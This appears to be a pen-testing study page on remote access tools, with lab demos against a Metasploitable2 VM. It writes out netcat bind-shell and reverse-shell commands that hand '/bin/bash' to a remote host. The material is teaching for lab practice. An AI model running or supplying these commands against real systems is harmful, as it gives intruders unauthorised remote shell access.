Penetration Test - Selecting_Pen_Testing_Tools(8)

Remote Access Tools

Tool Notes URL
SSH Secure shell Included or available in most OSs
NCAT Similar to nc, but from Nmap developers https://nmap.org/ncat/
NETCAT Same as nc Included or available in most OSs
Proxychains Forces TCP connections through a proxy https://github.com/haad/proxuchains
DEMO 1

Blind shell

Attacker: Kali Linux Target: Metasploitable2

Run the following commands on Target VM.

nc -lvp 4444 -e /bin/bash

Penetration Test - Selecting_Pen_Testing_Tools(8)

Then Run the following commands on Attacker VM.

nc 10.0.0.21 4444

Penetration Test - Selecting_Pen_Testing_Tools(8)

Penetration Test - Selecting_Pen_Testing_Tools(8)

DEMO 2

Reverse shell

Attacker: Kali Linux Target: Metasploitable2

Run the following commands on Attacker VM.

nc -lvp 4444

Penetration Test - Selecting_Pen_Testing_Tools(8)

Then Run the following commands on Target VM.

nc 10.0.0.18 4444 -e /bin/bash

Penetration Test - Selecting_Pen_Testing_Tools(8)

Penetration Test - Selecting_Pen_Testing_Tools(8)

QUICK REVIEW
  • There are multiple ways to leverage remote connections
  • The PenTests exam focuses on command-line tools for remote access
  • Remote access is often followed by privilege escalation attacks and/or preceded by credential attacks
上一篇:NETCAT(NC)工具使用


下一篇:各种反弹shell方法总结